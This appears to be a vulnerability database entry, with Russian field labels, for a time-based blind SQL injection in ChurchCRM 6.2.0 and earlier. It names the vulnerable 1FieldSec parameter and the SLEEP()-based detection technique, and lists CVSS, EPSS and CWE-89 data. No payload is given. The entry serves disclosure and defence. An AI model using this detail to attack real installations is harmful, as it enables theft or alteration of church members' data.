Описание
ChurchCRM is an open-source church management system. In ChurchCRM 6.2.0 and earlier, there is a time-based blind SQL injection in the handling of the 1FieldSec parameter. Injecting SLEEP() causes deterministic server-side delays, proving the value is incorporated into a SQL query without proper parameterization. The issue allows data exfiltration and modification via blind techniques.
Уязвимые конфигурации
Конфигурация 1Версия до 6.2.0 (включая)
cpe:2.3:a:churchcrm:churchcrm:*:*:*:*:*:*:*:*
EPSS
Процентиль: 12%
0.00041
Низкий
7.2 High
CVSS3
Дефекты
CWE-89
EPSS
Процентиль: 12%
0.00041
Низкий
7.2 High
CVSS3
Дефекты
CWE-89